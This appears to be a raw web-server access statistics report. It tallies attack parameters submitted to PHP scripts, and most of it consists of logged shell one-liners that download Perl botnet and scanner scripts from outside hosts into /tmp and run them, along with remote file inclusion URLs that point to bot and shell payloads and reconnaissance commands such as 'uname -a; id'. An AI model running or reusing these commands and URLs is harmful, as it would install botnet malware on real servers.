cd /tmp;rm botnet.txt;wget http://azume.zapto.org/botnet.txt
;fetch http://azume.zapto.org/botnet.txt;lwp-download http:/
/azume.zapto.org/botnet.txt;curl -O http://azume.zapto.org/b
otnet.txt;lynx http://azume.zapto.org/botnet.txt;perl botnet
.txt
7
cd /tmp;rm botnet.txt;wget http://fuckoff.no-ip.org/botnet.t
xt;fetch http://fuckoff.no-ip.org/botnet.txt;lwp-download ht
tp://fuckoff.no-ip.org/botnet.txt;curl -O http://fuckoff.no-
ip.org/botnet.txt;lynx http://fuckoff.no-ip.org/botnet.txt;p
erl botnet.txt
6
uname -a; id 5
cd /tmp;rm bot.txt;wget http://189.24.138.40/bot.txt;fetch h
ttp://189.24.138.40/bot.txt;lwp-download http://189.24.138.4
0/bot.txt;curl -O http://189.24.138.40/bot.txt;lynx http://1
89.24.138.40/bot.txt;perl bot.txt;rm -rf *.txt
4
cd /tmp;rm x.txt;wget http://www.killersofdragons.com/x.txt;
fetch http://www.killersofdragons.com/x.txt;lwp-download htt
p://www.killersofdragons.com/x.txt;curl -O http://www.killer
sofdragons.com/x.txt;lynx http://www.killersofdragons.com/x.
txt;perl x.txt
4
cd /tmp;rm bot.txt;wget http://www.3sk3nt.by.ru/bot.txt;fetc
h http://www.3sk3nt.by.ru/bot.txt;lwp-download http://www.3s
k3nt.by.ru/bot.txt;curl -O http://www.3sk3nt.by.ru/bot.txt;l
ynx http://www.3sk3nt.by.ru/bot.txt;perl bot.txt
3
cd /tmp;rm x.txt;wget http://189.6.162.125:8090/x.txt;fetch
http://189.6.162.125:8090/x.txt;lwp-download http://189.6.16
2.125:8090/x.txt;curl -O http://189.6.162.125:8090/x.txt;lyn
x http://189.6.162.125:8090/x.txt;perl x.txt
3
Parameter list
ValueAccesses
1 1
Parameter path
ValueAccesses
http://www.mta.cl/galeria2/galery.txt? 1
Parameter path[docroot]
ValueAccesses
http://www.jungo8949.co.kr/tool25.txt? 44
http://www.cosmick.kit.net/ty.txt? 24
http://www.capsoir.com/images/TRA.txt? 22
http://www.neoncomanda.kit.net/tool25.dat? 16
http://www.pucorp.t5.com.br/lp.txt? 14
http://proxysx.t35.com/x0.txt? 14
http://www2.binaryshadow.org:81/~w00t/my/tool/tool25.dat? 12
http://aszer.republika.pl/cos..txt? 12
http://aszer.republika.pl/cos1..txt? 10
10
Parameter path[docroot]http://phoenixgc.net/sikat?
ValueAccesses
2
OTHER: 769
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter cmd
ValueAccesses
cd /tmp;wget http://www.pedr0.kit.net/bb.txt;fetch http://ww
w.pedr0.kit.net/bb.txt;lwp-download http://www.pedr0.kit.net
/bb.txt;curl -O http://www.pedr0.kit.net/bb.txt;lynx http://
www.pedr0.kit.net/bb.txt;perl bb.txt;rm -rf bb.txt
9
cd /tmp;rm sta.txt;wget http://189.24.221.165:9090/sta.txt;f
etch http://189.24.221.165:9090/sta.txt;lwp-download http://
189.24.221.165:9090/sta.txt;curl -O http://189.24.221.165:90
90/sta.txt;lynx http://189.24.221.165:9090/sta.txt;perl sta.
txt;rm sta.txt
5
uname -a; id 4
cd /tmp;rm start.txt;wget http://189.24.38.227/start.txt;fet
ch http://189.24.38.227/start.txt;lwp-download http://189.24
.38.227/start.txt;curl -O http://189.24.38.227/start.txt;lyn
x http://189.24.38.227/start.txt;perl start.txt;rm start.txt
2
cd /tmp;rm pemlk.txt;wget http://members.lycos.co.uk/enviesc
raps/pemlk.txt;fetch http://members.lycos.co.uk/enviescraps/
pemlk.txt;lwp-download http://members.lycos.co.uk/enviescrap
s/pemlk.txt;curl -O http://members.lycos.co.uk/enviescraps/p
emlk.txt;lynx http://members.lycos.co.uk/enviescraps/pemlk.t
xt;perl pemlk.txt;rm -rf pemlk*.txt
2
cd /tmp;rm sta.txt;wget http://189.24.20.53/sta.txt;fetch ht
tp://189.24.20.53/sta.txt;lwp-download http://189.24.20.53/s
ta.txt;curl -O http://189.24.20.53/sta.txt;lynx http://189.2
4.20.53/sta.txt;perl sta.txt;rm sta.txt
1
cd /tmp;rm startindo.txt;wget http://start.helloweb.eu/botne
t/startindo.txt;fetch http://start.helloweb.eu/botnet/starti
ndo.txt;lwp-download http://start.helloweb.eu/botnet/startin
do.txt;curl -O http://start.helloweb.eu/botnet/startindo.txt
;lynx http://start.helloweb.eu/botnet/startindo.txt;perl sta
rtindo.txt;rm startindo.txt
1
cd /tmp;rm sta.txt;wget http://start.helloweb.eu/botnet/sta.
txt;fetch http://start.helloweb.eu/botnet/sta.txt;lwp-downlo
ad http://start.helloweb.eu/botnet/sta.txt;curl -O http://st
art.helloweb.eu/botnet/sta.txt;lynx http://start.helloweb.eu
/botnet/sta.txt;perl sta.txt;rm sta.txt
1
cd /tmp;rm start.txt;wget start.helloweb.eu/botnet/start.txt
;fetch start.helloweb.eu/botnet/start.txt;lwp-download start
.helloweb.eu/botnet/start.txt;curl -O start.helloweb.eu/botn
et/start.txt;lynx start.helloweb.eu/botnet/start.txt;perl st
art.txt;rm start.txt?
1
Parameter path[docroot]
ValueAccesses
http://h1.ripway.com/DiegoVirus/pbot.txt? 11
http://www.freewebs.com/yahwek/sete.txt? 7
http://www.freewebs.com/t420/p.txt?? 6
http://members.lycos.co.uk/enviescraps/pbot.txt? 6
http://www.freewebs.com/h1h1h1/p.txt?? 6
http://tibiaowns9.googlepages.com/GIKOBOTS.txt? 5
http://qlzrox.iespana.es/sb4? 5
http://bsthank.t35.com/spread.txt? 4
http://www.iff.coop/.../bre.txt? 4
http://3sk3nt.kit.net/p.txt? 3
OTHER: 887
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter cmd
ValueAccesses
cd /tmp;rm -rf pacote*;wget http://br.geocities.com/ozaminha
/pacote.txt;lwp-download http://br.geocities.com/ozaminha/pa
cote.txt;fetch http://br.geocities.com/ozaminha/pacote.txt;c
url -o pacote.txt http://br.geocities.com/ozaminha/pacote.tx
t;GET http://br.geocities.com/ozaminha/pacote.txt >pacote.tx
t;lynx -source http://br.geocities.com/ozaminha/pacote.txt >
pacote.txt;perl pacote.txt;rm -rf pacote.txt*
19
cd /tmp;rm -rf *;cd /tmp;lwp-download http://br.geocities.co
m/kaiooo.ownz/pacote.txt;fetch http://br.geocities.com/kaioo
o.ownz/pacote.txt;curl -o pacote.txt http://br.geocities.com
/kaiooo.ownz/pacote.txt;wget http://br.geocities.com/kaiooo.
ownz/pacote.txt;perl pacote.txt
12
cd /tmp;wget http://206.71.148.32/anaozao.txt;curl -O -f htt
p://206.71.148.32/anaozao.txt;lynx -source http://206.71.148
.32/anaozao.txt;lwp-rget http://206.71.148.32/anaozao.txt;fe
tch http://206.71.148.32/anaozao.txt;perl anaozao.txt;rm -rf
anaozao.txt
4
cd /tmp;rm -rf pitbull*;wget http://br.geocities.com/p4ulo.h
ack/pitbull.txt;lwp-download http://br.geocities.com/p4ulo.h
ack/pitbull.txt;fetch http://br.geocities.com/p4ulo.hack/pit
bull.txt;curl -o pitbull.txt http://br.geocities.com/p4ulo.h
ack/pitbull.txt;GET http://br.geocities.com/p4ulo.hack/pitbu
ll.txt >pitbull.txt;lynx -source http://br.geocities.com/p4u
lo.hack/pitbull.txt;perl pitbull.txt;rm -rf pitbull.txt*
3
cd /tmp;wget http://vsffdp.iespana.es/1.txt;curl -O http://v
sffdp.iespana.es/1.txt;fetch http://vsffdp.iespana.es/1.txt;
lynx http://vsffdp.iespana.es/1.txt;lwp-download http://vsff
dp.iespana.es/1.txt;perl 1.txt
3
uname -a; id 3
cd /tmp;rm -rf ChatBR*;wget http://br.geocities.com/chatbr.o
wnz/ChatBR.txt;lwp-download http://br.geocities.com/chatbr.o
wnz/ChatBR.txt;fetch http://br.geocities.com/chatbr.ownz/Cha
tBR.txt;curl -o ChatBR.txt http://br.geocities.com/chatbr.ow
nz/ChatBR.txt;GET http://br.geocities.com/chatbr.ownz/ChatBR
.txt >ChatBR.txt;lynx -source http://br.geocities.com/chatbr
.ownz/ChatBR.txt;perl ChatBR.txt;rm -rf ChatBR.txt*
2
cd /tmp;rm botf.txt;wget http://71.41.190.203/botf.txt;fetch
http://71.41.190.203/botf.txt;lwp-download http://71.41.190
.203/botf.txt;curl -O http://71.41.190.203/botf.txt;lynx htt
p://71.41.190.203/botf.txt;perl botf.txt;rm -rf botf.txt*
2
cd /tmp;rm -rf scan*;wget http://br.geocities.com/chatbr.own
z/scan.txt;lwp-download http://br.geocities.com/chatbr.ownz/
scan.txt;fetch http://br.geocities.com/chatbr.ownz/scan.txt;
curl -o scan.txt http://br.geocities.com/chatbr.ownz/scan.tx
t;GET http://br.geocities.com/chatbr.ownz/scan.txt >scan.txt
;lynx -source http://br.geocities.com/chatbr.ownz/scan.txt >
scan.txt;perl scan.txt;rm -rf scan.txt*
2
cd /tmp;rm s1t2a3r4t.txt;wget http://189.24.46.160:9090/s1t2
a3r4t.txt;fetch http://189.24.46.160:9090/s1t2a3r4t.txt;lwp-
download http://189.24.46.160:9090/s1t2a3r4t.txt;curl -O htt
p://189.24.46.160:9090/s1t2a3r4t.txt;lynx http://189.24.46.1
60:9090/s1t2a3r4t.txt;perl s1t2a3r4t.txt;rm s1t2a3r4t.txt
2
OTHER: 918
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
cd /tmp;rm bnet.txt;wget http://noden.110mb.com/bnet.txt;fet
ch http://noden.110mb.com/bnet.txt;lwp-download http://noden
.110mb.com/bnet.txt;curl -O http://noden.110mb.com/bnet.txt;
lynx http://noden.110mb.com/bnet.txt;perl bnet.txt;rm bnet.t
xt
2
OTHER: 968
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
uname -ahttp://www.neoncomanda.kit.net/tool25.dat? 1
cd /tmp;wget http://vsffdp.iespana.es/testeinbox2.txt;curl -
O http://vsffdp.iespana.es/testeinbox2.txt;fetch http://vsff
dp.iespana.es/testeinbox2.txt;lynx http://vsffdp.iespana.es/
testeinbox2.txt;lwp-download http://vsffdp.iespana.es/testei
nbox2.txt;perl testeinbox2.txt
1
cd /tmp;rm secret.txt;wget http://71.41.190.203/secret.txt;f
etch http://71.41.190.203/secret.txt;lwp-download http://71.
41.190.203/secret.txt;curl -O http://71.41.190.203/secret.tx
t;lynx http://71.41.190.203/secret.txt;perl secret.txt;rm -r
f secret.txt*http://www2.binaryshadow.org:81/~w00t/my/tool/t
ool25.dat?
1
cd /tmp;rm -rf botnet8*;wget http://br.geocities.com/ozaminh
a/pacote.txt;lwp-download http://br.geocities.com/ozaminha/p
acote.txt;fetch http://br.geocities.com/ozaminha/pacote.txt;
curl -o pacote.txt http://br.geocities.com/ozaminha/pacote.t
xt;GET http://br.geocities.com/ozaminha/pacote.txt >pacote.t
xt;lynx -source http://br.geocities.com/ozaminha/pacote.txt
>pacote.txt;perl pacote.txt*
1
OTHER: 966
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
cd /tmp;rm subale.txt;wget http://71.41.190.203/subale.txt;f
etch http://71.41.190.203/subale.txt;lwp-download http://71.
41.190.203/subale.txt;curl -O http://71.41.190.203/subale.tx
t;lynx http://71.41.190.203/subale.txt;perl subale.txt;rm -r
f *.txt
2
OTHER: 968
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
cd /tmp;rm ful.txt;wget http://71.41.190.203/ful.txt;fetch h
ttp://71.41.190.203/ful.txt;lwp-download http://71.41.190.20
3/ful.txt;curl -O http://71.41.190.203/ful.txt;lynx http://7
1.41.190.203/ful.txt;perl ful.txt;rm -rf ful.txt*
2
cd /tmp;rm -rf *;cd /tmp;lwp-download http://h1.ripway.com/k
aiooo/pacote.txt;fetch http://h1.ripway.com/kaiooo/pacote.tx
t;curl -o pacote.txt http://h1.ripway.com/kaiooo/pacote.txt;
wget http://h1.ripway.com/kaiooo/pacote.txt;perl pacote.txt
2
OTHER: 966
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
cd /tmp;rm sub.txt;wget http://71.41.190.203/sub.txt;fetch h
ttp://71.41.190.203/sub.txt;lwp-download http://71.41.190.20
3/sub.txt;curl -O http://71.41.190.203/sub.txt;lynx http://7
1.41.190.203/sub.txt;perl sub.txt;rm -rf *.txt
1
OTHER: 969
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
cd/var/tmp;id 2
cd /tmp;rm start.txt;wget http://71.41.190.203/start.txt;fet
ch http://71.41.190.203/start.txt;lwp-download http://71.41.
190.203/start.txt;curl -O http://71.41.190.203/start.txt;lyn
x http://71.41.190.203/start.txt;perl start.txt;rm -rf start
.txt*
2
uname -a 2
cd /tmp;killall perl -9;rm -rf *.txt;GET http://geocities.ya
hoo.com.br/zcrew99/alan.txt > alan.txt;perl alan.txt;rm alan
.txt
1
OTHER: 963
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
cd /tmp;rm start.txt;wget http://189.24.201.140/start.txt;fe
tch http://189.24.201.140/start.txt;lwp-download http://189.
24.201.140/start.txt;curl -O http://189.24.201.140/start.txt
;lynx http://189.24.201.140/start.txt;perl start.txt;rm star
t.txt
1
cd /tmp;rm start.txt;wget http://71.41.190.203/start.txt;fet
ch http://71.41.190.203/start.txt;lwp-download http://71.41.
190.203/start.txt;curl -O http://71.41.190.203/start.txt;lyn
x http://71.41.190.203/start.txt;perl start.txt;rm -rf start
.txt*
1
Parameter path[docroot]
ValueAccesses
http://noden.110mb.com/tool25.txt? 12
OTHER: 956
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter cmd
ValueAccesses
cd /tmp;wget http://www.scotao.com/scan.txt;curl -O http://w
ww.scotao.com/scan.txt;fetch http://www.scotao.com/scan.txt;
lynx http://www.scotao.com/scan.txt;lwp-download http://www.
scotao.com/scan.txt;perl scan.txt
1
OTHER: 969
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
cd /tmp;wget http://vsffdp.iespana.es/1.txt;curl -O http://v
sffdp.iespana.es/1.txt;fetch http://vsffdp.iespana.es/1.txt;
lynx http://vsffdp.iespana.es/1.txt;lwp-download http://vsff
dp.iespana.es/1.txt;perl 1.txt
1
Parameter list
ValueAccesses
1 9
Parameter path[docroot]
ValueAccesses
http://www.h4x0r-s.kit.net/tool/tool25.dat? 9
http://www.santiagoonline.com.ar/readme.txt? 3
http://freewebs.com/normancito/kaka.txt?? 3
OTHER: 945
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter cmd
ValueAccesses
cd /tmp;wget http://206.71.148.89/ferita.txt;curl -O -f http
://206.71.148.89/ferita.txt;lynx -source http://206.71.148.8
9/ferita.txt;lwp-rget http://206.71.148.89/ferita.txt;fetch
http://206.71.148.89/ferita.txt;perl ferita.txt;rm -rf ferit
a.txt
3
OTHER: 967
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://nartok.com/CMS/cache/traira.txt? 8
http://usuarios.arnet.com.ar/larry123/http? 4
http://seideiaslegais.googlepages.com/own.txt?? 3
http://kamstorn.googlepages.com/botnet.txt? 3
http://h1.ripway.com/DiegoVirus/pbot2.txt? 3
http://www.personal-training-syb.de/images/stories/traira.tx
t?
2
http://fotoszip.pop3.ru/r.txthttp://fotoszip.pop3.ru/r.txt 2
http://alviverde.we.bs/mateusjp.txt? 2
OTHER: 943
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter cmd
ValueAccesses
id 2
OTHER: 968
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://rogiels.googlepages.com/teste.gif?? 1
http://webmail.servidoreswin.com/bitch.txt??? 1
http://www.comandante-do-bope.com/pbot.txt? 1
http://javaatualiza.t35.com/testeglobo.txt? 1
http://h1.ripway.com/brunas2/lp.txt? 1
OTHER: 965
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter cmd
ValueAccesses
cd /tmp;killall perl -9;rm -rf *.txt;GET http://murilok.pop3
.ru/RFI3.txt > RFI3.txt;perl RFI3.txt;rm RFI3.txt
3
OTHER: 967
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://qlzr.net/sb4? 1
http://www.interirc.net/macaco.txt? 1
http://vcsok.com/echo?http://www.cruiseinternational.co.uk//
forum/img/nab.txt??
1
http://www.whoirc.org/netbot.txt? 1
OTHER: 966
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter cmd
ValueAccesses
cd /var/tmp;id 3
OTHER: 967
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://www.dreadsot.com/tester.txt? 1
OTHER: 969
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter cmd
ValueAccesses
cd /tmp;rm x.txt;wget http://201.37.71.117:8090/x.txt;fetch
http://201.37.71.117:8090/x.txt;lwp-download http://201.37.7
1.1175:8090/x.txt;curl -O http://201.37.71.117:8090/x.txt;ly
nx http://201.37.71.117:8090/x.txt;perl x.txt
12
cd /tmp;rm -rf *;cd /tmp;lwp-download http://br.geocities.co
m/ozaminha/pacote.txt;fetch http://br.geocities.com/ozaminha
/pacote.txt;curl -o pacote.txt http://br.geocities.com/ozami
nha/pacote.txt;wget http://br.geocities.com/ozaminha/pacote.
txt;perl pacote.txt
5
OTHER: 953
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://eoi-castello.uji.es/user_upload/File/ultimate.txt? 1
OTHER: 969
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter cmd
ValueAccesses
cd /tmp;wget http://74.63.66.62/ferinhaa.txt;curl -O -f http
://74.63.66.62/ferinhaa.txt;lynx -source http://74.63.66.62/
ferinhaa.txt;lwp-rget http://74.63.66.62/ferinhaa.txt;fetch
http://74.63.66.62/ferinhaa.txt;perl ferinhaa.txt;rm -rf fer
inhaa.txt
2
cd /tmp;rm secret.txt;wget http://71.41.190.203/secret.txt;f
etch http://71.41.190.203/secret.txt;lwp-download http://71.
41.190.203/secret.txt;curl -O http://71.41.190.203/secret.tx
t;lynx http://71.41.190.203/secret.txt;perl secret.txt;rm -r
f secret.txt*
1
cd /tmp;killall perl -9;rm -rf *.txt;GET http://geocities.ya
hoo.com.br/xmpzzz/scanz2.txt > scanz2.txt;perl scanz2.txt;rm
scanz2.txt
1
OTHER: 966
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://xsenharox.xpg.com.br/suvbni? 1
OTHER: 969
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter cmd
ValueAccesses
cd /tmp;rm tut.txt;wget http://malware.t35.com/tut.txt;fetch
http://malware.t35.com/tut.txt;lwp-download http://malware.
t35.com/tut.txt;curl -O http://malware.t35.com/tut.txt;lynx
http://malware.t35.com/tut.txt;perl tut.txt;rm -rf tut.txt*h
ttp://www2.binaryshadow.org:81/~w00t/my/tool/tool25.dat?
1
OTHER: 969
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://river.hostinggratisargentina.com/http? 1
http://www.acb.bs.it/moodledata/cache/enviar3.jpg? 1
207.56.139.189/intru.txt 1
http://javaatualiza.t35.com/xrootuol.txt? 1
http://hurikakete.g.ribbon.to/albanian-shell.htm? 1
OTHER: 965
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter cmd
ValueAccesses
cd /tmp;rm -rf *;cd /tmp;lwp-download http://h1.ripway.com/k
aiooo/AllInOne.txt;fetch http://br.geocities.com/kaiooo.ownz
/pacote.txt;curl -o AllInOne.txt http://h1.ripway.com/kaiooo
/AllInOne.txt;wget http://h1.ripway.com/kaiooo/AllInOne.txt;
perl AllInOne.txt
1
cd /tmp;rm -rf *;cd /tmp;lwp-download http://www.mediart.lu/
fr/urb.txt;fetch http://www.mediart.lu/fr/urb.txt;curl -o ur
b.txt http://www.mediart.lu/fr/urb.txt;wget http://www.media
rt.lu/fr/urb.txt;perl urb.txt;rm -rf urb.txt
1
cd /tmp;rm -rf hax0rzinhosim*;wget http://br.geocities.com/p
4ulo.hack/hax0rzinhosim.txt;lwp-download http://br.geocities
.com/p4ulo.hack/hax0rzinhosim.txt;fetch http://br.geocities.
com/p4ulo.hack/hax0rzinhosim.txt;curl -o hax0rzinhosim.txt h
ttp://br.geocities.com/p4ulo.hack/hax0rzinhosim.txt;GET http
://br.geocities.com/p4ulo.hack/hax0rzinhosim.txt >hax0rzinho
sim.txt;lynx -source http://br.geocities.com/p4ulo.hack/hax0
rzinhosim.txt >hax0rzinhosim.txt;perl hax0rzinhosim.txt;rm -
rf hax0rzinhosim.txt*
1
cd /tmp;rm -rf roots*;wget http://ownedson.110mb.com/roots.t
xt;lwp-download http://ownedson.110mb.com/roots.txt;fetch ht
tp://ownedson.110mb.com/roots.txt;curl -o roots.txt http://o
wnedson.110mb.com/roots.txt;GET http://ownedson.110mb.com/ro
ots.txt >roots.txt;lynx -source http://ownedson.110mb.com/ro
ots.txt;perl roots.txt;rm -rf roots.txt*
1
cd /tmp;rm start.txt;wget http://189.24.38.250:8090/start.tx
t;fetch http://189.24.38.250:8090/start.txt;lwp-download htt
p://189.24.38.250:8090/start.txt;curl -O http://189.24.38.25
0:8090/start.txt;lynx http://189.24.38.250:8090/start.txt;pe
rl start.txt;rm start.txt
1
cd /tmp;id 1
cd /tmp;rm x.txt;wget http://baixinho.we.bs/x.txt;fetch http
://baixinho.we.bs/x.txt;lwp-download http://baixinho.we.bs/x
.txt;curl -O http://baixinho.we.bs/x.txt;lynx http://baixinh
o.we.bs/x.txt;perl x.txt
1
cd /tmp;rm -rf shell*;wget http://br.geocities.com/chatbr.ow
nz/shell.txt;lwp-download http://br.geocities.com/chatbr.own
z/shell.txt;fetch http://br.geocities.com/chatbr.ownz/shell.
txt;curl -o shell.txt http://br.geocities.com/chatbr.ownz/sh
ell.txt;GET http://br.geocities.com/chatbr.ownz/shell.txt >s
hell.txt;lynx -source http://br.geocities.com/chatbr.ownz/sh
ell.txt;perl shell.txt;rm -rf shell.txt*
1
cd /tmp;rm srz.txt;wget http://www.freewebs.com/kctdaporra/s
rz.txt;fetch http://www.freewebs.com/kctdaporra/srz.txt;lwp-
download http://www.freewebs.com/kctdaporra/srz.txt;curl -O
http://www.freewebs.com/kctdaporra/srz.txt;lynx http://www.f
reewebs.com/kctdaporra/srz.txt;perl srz.txt;rm -rf srz.txt*
1
Parameter mosConfig_absolute_path
ValueAccesses
http://www.neoncomanda.kit.net/tool25.dat? 35
OTHER: 926
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter cmd
ValueAccesses
cd /tmp;rm botnet.txt;wget http://nodan.110mb.com/botnet.txt
;fetch http://nodan.110mb.com/botnet.txt;lwp-download http:/
/nodan.110mb.com/botnet.txt;curl -O http://nodan.110mb.com/b
otnet.txt;lynx http://nodan.110mb.com/botnet.txt;perl botnet
.txt;rm botnet.txt
10
OTHER: 960
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://www.chamala.kit.net/tool25.txt? 26
http://ownsirc.googlepages.com/botnet.txt? 22
http://208.74.174.183/brizola.txt? 16
http://216.83.134.89/teste2bot.txt? 15
http://mwebhostx.com.br/x.txt? 12
http://www.freewebs.com/sethz/php.txt? 11
http://overowns.googlepages.com/donottouch.txt? 10
http://gikowns.googlepages.com/BOTNET-BRIZOLA.txt? 9
http://www.ilegais.110mb.com/cmd.txt? 7
http://www.germ2.com/www/scmd.gif? 7
OTHER: 835
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter cmd
ValueAccesses
cd /tmp;rm botnet.txt;wget http://noden.110mb.com/botnet.txt
;fetch http://noden.110mb.com/botnet.txt;lwp-download http:/
/noden.110mb.com/botnet.txt;curl -O http://noden.110mb.com/b
otnet.txt;lynx http://noden.110mb.com/botnet.txt;perl botnet
.txt;rm botnet.txt
10
OTHER: 960
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://www.freewebs.com/sur00tseclan/httd.txt? 4
http://bialoka123.fileave.com/script9.txt?? 4
http://raptor.we.bs/ind.txt? 4
OTHER: 958
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter cmd
ValueAccesses
cd /tmp;rm sur0.txt;wget http://71.41.190.203/sur0.txt;fetch
http://71.41.190.203/sur0.txt;lwp-download http://71.41.190
.203/sur0.txt;curl -O http://71.41.190.203/sur0.txt;lynx htt
p://71.41.190.203/sur0.txt;perl sur0.txt;rm -rf sur0.txt*
4
cd /tmp;rm start.txt;wget http://189.24.38.250:8090/start.tx
t;fetch http://189.24.38.250:8090/start.txt;lwp-download htt
p://189.24.38.250:8090/start.txt;curl -O http://189.24.38.25
0:8090/start.txt;lynx http://189.24.38.250:8090/start.txt;pe
rl start.txt;rm start.txt
3
cd /tmp;rm s1t2a3r4t.txt;wget http://189.24.167.23:9090/s1t2
a3r4t.txt;fetch http://189.24.167.23:9090/s1t2a3r4t.txt;lwp-
download http://189.24.167.23:9090/s1t2a3r4t.txt;curl -O htt
p://189.24.167.23:9090/s1t2a3r4t.txt;lynx http://189.24.167.
23:9090/s1t2a3r4t.txt;perl s1t2a3r4t.txt;rm s1t2a3r4t.txt
2
cd /tmp;wget http://projectyenor2.iespana.es/goo.txt;curl -O
http://projectyenor2.iespana.es/goo.txt;fetch http://projec
tyenor2.iespana.es/goo.txt;lynx http://projectyenor2.iespana
.es/goo.txt;lwp-download http://projectyenor2.iespana.es/goo
.txt;perl goo.txt
1
OTHER: 960
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
cd /tmp;wget http://kadbest1.free.fr/modules/tinycontent/adm
in/spaw/bash/atrix.txt;curl -O -f http://kadbest1.free.fr/mo
dules/tinycontent/admin/spaw/bash/atrix.txt;lynx -source htt
p://kadbest1.free.fr/modules/tinycontent/admin/spaw/bash/atr
ix.txt;lwp-rget http://kadbest1.free.fr/modules/tinycontent/
admin/spaw/bash/atrix.txt;fetch http://kadbest1.free.fr/modu
les/tinycontent/admin/spaw/bash/atrix.txt;perl atrix.txt;rm
-rf atrix.txt
1
OTHER: 969
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
cd /tmp;rm pemlk.txt;wget http://pemlk.iespana.es/toolshttp:
//pemlk.iespana.es/tools/pemlk.txt;fetch http://pemlk.iespan
a.es/toolshttp://pemlk.iespana.es/tools/pemlk.txt;lwp-downlo
ad http://pemlk.iespana.es/toolshttp://pemlk.iespana.es/tool
s/pemlk.txt;curl -O http://pemlk.iespana.es/toolshttp://peml
k.iespana.es/tools/pemlk.txt;lynx http://pemlk.iespana.es/to
olshttp://pemlk.iespana.es/tools/pemlk.txt;perl pemlk.txt;rm
pemlk.txt?
1
cd /tmp;rm start.txt;wget http://189.24.167.23:9090/start.tx
t;fetch http://189.24.167.23:9090/start.txt;lwp-download htt
p://189.24.167.23:9090/start.txt;curl -O http://189.24.167.2
3:9090/start.txt;lynx http://189.24.167.23:9090/start.txt;pe
rl start.txt;rm start.txt
1
OTHER: 968
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
